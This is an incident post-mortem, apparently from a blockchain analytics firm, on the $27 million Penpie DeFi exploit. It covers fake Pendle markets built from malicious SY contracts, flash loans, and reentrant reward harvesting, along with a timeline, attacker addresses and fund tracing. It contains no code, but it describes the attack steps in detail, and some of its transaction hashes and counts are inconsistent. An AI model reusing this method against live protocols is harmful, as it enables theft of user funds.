The Penpie Heist

On September 3rd, 2024, Penpie, a yield farming protocol built on the Pendle Finance ecosystem, suffered a major exploit that led to the loss of approximately $27 million in crypto assets. The attacker exploited vulnerabilities in Penpie by introducing a fake market on Pendle Finance, using malicious contracts disguised as SY (Standardized Yield) Tokens, which were linked to Pendle Liquidity Provider Tokens (LPT). This manipulation enabled the attacker to artificially inflate rewards, which were subsequently redeemed for various assets, including staked ETH (stETH), agETH, rswETH, sUSDE, and gUSDC.

Penpie’s Role in Pendle Finance

Penpie plays a pivotal role within the Pendle Finance ecosystem by offering yield optimization and boosting services using veTokenomics (Voting Escrow Tokenomics). Through Penpie, users can lock PENDLE tokens, gain governance rights, and maximize both their rewards and governance participation. These functionalities are critical in enhancing the overall utility and growth of Pendle Finance.

Attack Overview and Initial Response

Following the exploit, both Penpie and Pendle Finance promptly halted their operations to limit further damage. Despite these measures, the exploit significantly impacted the tokens associated with both protocols. Penpie’s native token (PNP) saw a dramatic 40% drop in value, while PENDLE itself experienced a 9% decline. This rapid devaluation highlights the far-reaching consequences of security vulnerabilities in decentralized finance (DeFi) ecosystems.

SY - Standardized Yield Tokens are the contracts to wrap any yield bearing tokens.

PT- Principal Tokens represents the principal amount in the future date

YT- Yield Tokens represents future yield

LPT- Liquidity provide Tokens are a certificate of providing liquidity in the protocol

PRT- Pool Reward Toekns are a certificate you get after depositing LPT into Penpie Pool

Addresses and Transactions

• Main Attacker Address: 0x7a2f4d625fb21f5e51562ce8dc2e722e12a61d1b

• Malicious SY Contracts:

  1. 0x4af4c234b8cb6e060797e87afb724cfb1d320bb7

  2. 0x4476b6ca46b28182944ed750e74e2bb1752f87ae

  3. 0xcde2cd6aeaaf0238f4ce33295be13704e4a97de2

  4. 0x4BC9815b859c8172CEe1ab2CD372fD0Eb00eb487

• Key Exploit Transactions:

1. 0x42b2ec27c732100dd9037c76da415e10329ea41598de453bb0c0c9ea7ce0d8e5 (Ethereum)

2. 0x7e7f9548f301d3dd863eac94e6190cb742ab6aa9d7730549ff743bf84cbd21d1 (Ethereum)

3. 0x56e09abb35ff12271fdb38ff8a23e4d4a7396844426a94c4d3af2e8b7a0a2813 (Ethereum)

4. 0x67c5400da117b906f8c0fc5f5149e4ea10ed6358cd9ea2ec0ed8f559d757b7df (Arbitrum)

Decoding the Exploit

The root cause of the exploit was Penpie’s flawed assumption that all markets created on Pendle were legitimate. The attacker was able to create three malicious SY contract and mint counterfeit tokens, including PT-stETH 26DEC2024 (Principal Tokens) and YT-stETH 26DEC2024 (Yield Tokens). By staking these counterfeit tokens, the attacker acquired Liquidity Provider Tokens (LPT), which were then deposited into Penpie’s pool to receive Pool Reward Tokens (PRT).

The attacker leveraged the batchHarvestMarketRewards() function in the Pendle Staking Contract. By utilizing flash loans from Balancer ( A DeFi protocol), particularly involving sUSDE, wstETH, agETH and rswETH, they injected significant liquidity into the fake market. This liquidity inflow triggered the redeemRewards() function of the malicious SY contract, which temporarily inflated the attacker’s staking balance. As a result, they were able to claim disproportionately large rewards.

A key vulnerability that was exploited in this attack was the absence of a reentrancy guard. The attacker was able to repeatedly call the reward function within the same transaction, as they were the sole depositor in the fake market. This allowed them to continuously harvest rewards, leading to the unauthorized accumulation of assets.

Once the rewards were claimed, the attacker burned the PRT tokens, withdrew all liquidity, and redeemed the rewards. The flash loans were subsequently repaid, and the attacker walked away four times with nearly $27 Million. An important thing to mention that this exploit not only happened on Ethereum, but on Arbitrum as well.

This attack underscores the critical need for market validation, reentrancy protections, and improved reward distribution mechanisms in DeFi protocols.

Hack Breakdown and Timeline

1. Creation of Malicious Contracts and Tokens at 1:41 PM on 3rd Sept, 2024

At 1:41 PM on September 3rd, the attacker created the malicious SY contract. They used it to mint fake PT and YT tokens linked to non-existent assets. (Tx-0xfda0dde38fa4c5b0e13c506782527a039d3a87f93f9208c104ee569a642172cd2).

2. Creation of Fake Pendle Market at 1:44 PM on 3rd September

By 1:44 PM, the attacker used the malicious tokens to create a fake market in Penpie’s system. This fake market enabled them to manipulate the liquidity pools. (Tx-0xfda0dde38fa4c5b0e13c506782527a039d3a87f93f9208c1 04ee569a642172d2)

3. First Attack Execution at 2:23 PM on 3rd September

The attacker used Attacker 2 address (0xc0eb7e6e2b94aa43bdd0c60e645fe915d5c6eb84), And used flash loans from Balancer to inflate liquidity with assets like wstETH, sUSDE, agETH, and rswETH.

Once having enough liquidity, the attacker manipulated batchHarvestMarketRewards() function which allowed the Attacker to call redeemRewards() function, allowing to harvest rewards multiple times, despite providing no real liquidity.

After removing all the liquidity and withdrawing all the rewards, along with returning the flash loans, the exploiter transferred all the funds from the Attack contract to Attacker 1 at 2:27 Pm (Tx-0x5f348e5d7802bdfcb5e3b7515d8d0a50c6a1067cf2fe6633334abce4bc2ee8f0).

4. Creation of another Malicious SY Contract at 2:31 PM on 3rd September

The attacker continued to exploit Penpie using a similar strategy by creating new malicious SY contract.

On important thing to mention, all the fake tokens were introduced using PendleYeildContractFactory contract and all the Fake markets creation were done by PendleMarketFactoryV3 contract.

The main reason behind creation of fake YT and PT tokens is to get the valuable LP and PRT tokens, as a proof of providing liquidity and inflate the rewards.

5. The Second Attack at 2:37 PM on 3rd September

Now, the Attacker after getting the PRT and YT tokens, began again by knocking the doors of Balancer Vault and borrowing large amounnts of agETH and rswETH tokens through flash loans.

Then again they exploited the batchHarvestMarketRewards() function of the pool and triggering redeemRewards function of the new Fake Market (0x5b6c...), setting the rewards to the new two market tokens, depositing them into the Penpie Pool and triggering multiclaim() function fo the Master Penpie contract being the only depositer.

This allowed him to withdraw the LPT tokens. Finally, the Attacker burnt the PRT tokens, withdrew all the rewards and liquidity, paid by the flash loans, eventually profitting.

6. Creation of Another Malicious SY contract at 2:38 PM on 3rd September

The Attacker executed the same startegy third time in the similar fashion, gaining some more agETH and rswETH.

Tracing the Funds

Using Blockscope’s Tracer tool, we identified the paths taken by the attacker to obscure the stolen funds. The image below shows the transfer of funds to the Attacker from various Malicious contracts.

The majority of assets were funneled through Tornado Cash, making further tracking difficult. The visualization tool clearly highlights the Rubic Offset Router being used to swap rewards and various intermediary addresses that facilitated fund tunneling.

Associated Addresses

Let's have a look on all the major addresses invloved in this Penpie Exploit. Although we found a lot of addresses and wallets but we would like to mention only the relevant ones, which makes sense. Using our Cohort Analysis, we have tried to visualize all the major wallets and contracts involved int his exploit.

List of all the Associated Addresses

Notable Obervations

Cross-Chain Exploit: The attack was executed not only on Ethereum but also on Arbitrum, where the attacker leveraged flash loans in gUSDC and exploited the protocol similarly using another malicious contract (0x4bc9815b859c8172cee1ab2cd372fd0eb00eb487).

Audited Protocols: Despite being audited by WatchPug and Zokyo, Penpie and Pendle Finance failed to detect the critical vulnerabilities that enabled this reentrancy attack. This highlights the necessity for ongoing audits and real-time monitoring.

Messages to Attacker: Numerous messages were sent to the attacker post-exploit, including offers of assistance from bounty hunters and others who were attempting to capitalize on the situation.

Monitoring

We’ve activated Blockscope’s Watchtower to continuously monitor transactions involving more than 12 addresses linked to the $27 Million Penpie Hack. Our public watchtower provides real-time surveillance, ensuring no suspicious movement goes unnoticed as we work to track and analyze the attacker's activities.

Conclusion

The $27 million Penpie exploit serves as a reminder of the vulnerabilities that persist in the DeFi ecosystem, despite audits and security checks. Strengthening market validation processes and implementing better safeguards like reentrancy guards and real-time monitoring systems are essential to prevent such devastating attacks in the future.

Investigation by: Tushar Tiwari, Analyst @ Blockscope

Disclaimer: Best Effort Investigation

This investigation and its findings represent our best effort based on the information available at the time. However, please be aware of the following limitations:

• The data used in this investigation may contain inaccuracies, omissions, or errors.

• Information sources may be incomplete or subject to change.

• New evidence may emerge that could alter the conclusions.

• Analysis and interpretations are based on current understanding and may evolve.

We have made every reasonable attempt to ensure accuracy, but cannot guarantee that all information is entirely correct or complete. This report should be considered a snapshot of our current knowledge and understanding, subject to revision as new information becomes available.